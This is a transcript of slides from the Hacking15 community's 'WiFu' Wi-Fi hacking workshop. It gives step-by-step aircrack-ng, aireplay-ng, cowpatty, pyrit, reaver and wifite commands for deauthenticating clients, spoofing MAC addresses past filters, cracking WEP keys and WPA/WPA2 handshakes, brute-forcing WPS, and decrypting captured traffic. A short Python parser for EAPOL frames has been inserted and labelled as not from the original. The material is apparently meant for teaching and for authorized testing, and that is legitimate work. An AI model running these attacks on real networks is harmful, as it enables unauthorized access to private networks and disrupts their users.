WiFu Wi-Fi Hacking Tools Hacking15

The Hacking15 community is holding the WiFu: Wi-Fi Hacking workshop, "How to hack Wi-Fi networks", on Saturday 19/3
by

Mohamed Thabet

on 4 April 2014

Transcript of WiFu Wi-Fi Hacking Tools Hacking15

WiFu Wi-Fi Hacking Tools Hacking15
WEP
WPA/WPA-2
Agenda
Tools
- Kali Setup
- Wireless Card & Channels
- Aircrack-ng Package
- Wireshark
- Wifite/Reaver
WPA/WPA-2
- Understanding WPA/WPA2
- WPA/WPA2 Cracking
- Create Password List (Dictionary)
- After Cracking
Tools
Kali Setup
Wireless Card & Channels
Aircrack-ng Package
Wireshark
Dissecting Ap-Client Connections
WEP
- Understanding WEP
- WEP Cracking
- Mac Filtering
Alfa Wi-Fi Network Adapter
Wi-Fi Channels
Channel Over The World
Graphical representation of 2.4 GHz band channels overlapping
Airmon-ng
#ifconfig
#iwconfig
#airmon-ng start wlan0
#airmon-ng stop mon0
#iwconfig wlan0 channel 5
#iwconfig mon0 channel 1
# macchanger -m NewMAC
# airodump-ng mon0
# airodump-ng mon0 --channel 1
# airodump-ng -w data mon0
# airodump-ng -r data-01.cap
# airodump-ng --encrypt WEP/WPA/WPA-2 mon0
# airodump-ng --bssid AA:AA:AA:AA:AA:AA mon0
Airodump-ng
Airgraph-ng
The following creates a Client to Access point Relationship Graph
# airgraph-ng -i demo.csv -o demo.png -g CAPR
The following creates a Client to Probe Request Graph
# airgraph-ng -i demo.csv -o demo.png -g CPG
basic deauth
# aireplay-ng --deauth 0 -a AA:AA:AA:AA:AA:AA mon0
broadcast deauth
# aireplay-ng --deauth 5 -a AA:AA:AA:AA:AA:AA -c BB:BB:BB:BB:BB:BB mon0
Aireplay-ng
Broadcast With Encryption
# airbase-ng -a AA:AA:AA:AA:AA:AA --essid Hacking15 -c 1 mon0
Broadcast with Encryption WPA ....
# airbase-ng -a AA:AA:AA:AA:AA:AA --essid Hacking15 -c 1 -z 2 mon0
Airbase-ng
Aircrack-ng
Hidden SSIDs
Client - Ap
Open System
There are 2 ways to learn the SSID
Passive
Monitor the air for a new client trying to associate with the AP
Active
De-authenticate one or all clients and monitor the re-connections
AP-Client State Machine
MAC Filter
Without MAC Filter
# aireplay-ng --fakeauth 10 -e Hacking15 mon0
It will succeed :)

With MAC Filter
# aireplay-ng --fakeauth 10 -e Hacking15 mon0
It will fail :(
We will use the MAC of an authorized user
# aireplay-ng --fakeauth 10 -e Hacking15 -h AA:AA:AA:AA:AA:AA mon0
It will succeed :)
Broadcast With Encryption
# airbase-ng -a AA:AA:AA:AA:AA:AA --essid Hacking15 -c 1 mon0
Broadcast with Encryption WPA ....
# airbase-ng -a AA:AA:AA:AA:AA:AA --essid Hacking15 -c 1 -z 2 mon0
Airbase-ng (Honeypot)
Understanding WEP
WEP Cracking
#aircrack-ng data-01.cap
#aircrack-ng data-01.cap -w dic
Step 1
# airodump-ng --bssid AA:AA:AA:AA:AA:AA -w wep_1 mon0
Step 2
# aircrack-ng wep_1-01.cap
Case I
Step 1
# airodump-ng mon0 -w wep
# aireplay-ng --fakeauth 0 -a AA:AA:AA:AA:AA:AA -h BB:BB:BB:BB:BB:BB mon0
Step 2
# aireplay-ng --arpreplay -b AA:AA:AA:AA:AA:AA -h BB:BB:BB:BB:BB:BB mon0
Step 3
# aircrack-ng wep-01.cap
Case II
Case III
#wifite
Create Password List (Dictionary)
Understanding WPA/WPA2
WPA/WPA2 Cracking
After Cracking
Generate Password List
# crunch 8 8 1234567890 > List_1
#crunch 8 8 1234567890 -t 012@@@@@@ > List_2
Difference between WPA-PSK and WPA2-PSK
Check the EAPOL packet
WPA-PSK
HMAC-MD5 for MIC and RC4 for encryption

WPA2-PSK
HMAC-SHA1 for MIC and AES for encryption
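
The EAPOL check described above, as an added example that is not from the original slides: a Python parser that reads the Key Descriptor Version from the Key Information field of an EAPOL-Key frame and reports the MIC and cipher pair it indicates, flagging the legacy MD5/RC4 case. The sample frames are constructed, and all function and field names are assumptions of this example.

```python
import struct

# Key Descriptor Version (Key Information bits 0-2) -> (MIC, cipher),
# limited to the two cases named on the slide.
DESCRIPTOR_VERSIONS = {1: ("HMAC-MD5", "RC4"), 2: ("HMAC-SHA1", "AES")}
DESCRIPTOR_TYPES = {254: "WPA", 2: "RSN/WPA2"}


def parse_eapol_key(frame: bytes) -> dict:
    """Decode the fixed fields at the start of an EAPOL-Key frame."""
    if len(frame) < 9:
        raise ValueError("frame too short for an EAPOL-Key header")
    _version, packet_type, body_len = struct.unpack_from("!BBH", frame, 0)
    if packet_type != 3:                      # 3 = EAPOL-Key
        raise ValueError("not an EAPOL-Key frame")
    if body_len > len(frame) - 4:
        raise ValueError("declared body length exceeds captured bytes")
    desc_type, key_info, key_len = struct.unpack_from("!BHH", frame, 4)
    version = key_info & 0x0007
    mic, cipher = DESCRIPTOR_VERSIONS.get(version, ("unknown", "unknown"))
    return {
        "descriptor": DESCRIPTOR_TYPES.get(desc_type, f"unknown ({desc_type})"),
        "version": version,
        "mic": mic,
        "cipher": cipher,
        "pairwise": bool(key_info & 0x0008),
        "ack": bool(key_info & 0x0080),       # set by the AP (messages 1 and 3)
        "mic_present": bool(key_info & 0x0100),
        "key_length": key_len,
        "legacy": version == 1,               # MD5/RC4: flag for migration
    }


def build_sample(desc_type: int, key_info: int, key_len: int) -> bytes:
    """Constructed handshake message 1: header fields set, the rest zeroed."""
    body = struct.pack("!BHH", desc_type, key_info, key_len) + bytes(90)
    return struct.pack("!BBH", 1, 3, len(body)) + body


SAMPLE_WPA = build_sample(254, 0x0089, 32)    # constructed sample
SAMPLE_WPA2 = build_sample(2, 0x008A, 16)     # constructed sample

if __name__ == "__main__":
    for name, frame in (("WPA", SAMPLE_WPA), ("WPA2", SAMPLE_WPA2)):
        info = parse_eapol_key(frame)
        print(name, info["descriptor"], info["mic"], info["cipher"], info["legacy"])
```
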
# airdecap-ng -e Hacking15 -p 123456 Hacking15-01.cap
# airdecap-ng -e Hacking15 -p 123456 Hacking15-01.cap -b AA:AA:AA:AA:AA:AA
Decrypt Packet
Wireshark

# aircrack-ng WPA-01.cap
# aircrack-ng WPA-01.cap -w dic
# cowpatty -f dic -r hacking15-01-.cap -s Hacking15
# genpmk -f dic -s Hacking15 -d dic-pre-computed-pmks
# cowpatty -d dic-pre-computed-pmks -s Hacking15 -r WPA-01.cap
Speed WPA/WPA2 Cracking
# pyrit -r wpa-01.cap analyze
# pyrit -r wpa-01.cap -i dic-pre-computed-pmks attack_cowpatty
# airolib-ng PMK-Airolib --import dic-pre-computed-pmks
# aircrack-ng -r PMK-Airolib wpa-01.cap
Block Diagram
Cracking
# wash -i wlan0 -c 7 -C s
# reaver -i mon0 -b MAC --fail-wait=360
# wifite
WiFu Wi-Fi Hacking
Mohamed Thabet
Thabet@Hacking15.org
WPS
100,000,000 unique keys
With a brute-force speed of 1 key/second, we are looking at 1,157 days to crack the WPS key.
brute force
reaver-wifite
WPA/WPA2 Enterprise
Understanding
Cracking
- Dissecting AP-Client Connections
- Hidden SSIDs
Other
- Dissecting AP-Client Connections
- Hidden SSIDs
- Honeypot
Intro
http://www.hacking15.org
https://www.facebook.com/hacking15
https://twitter.com/hacking15
https://plus.google.com/u/0/+Hacking15Org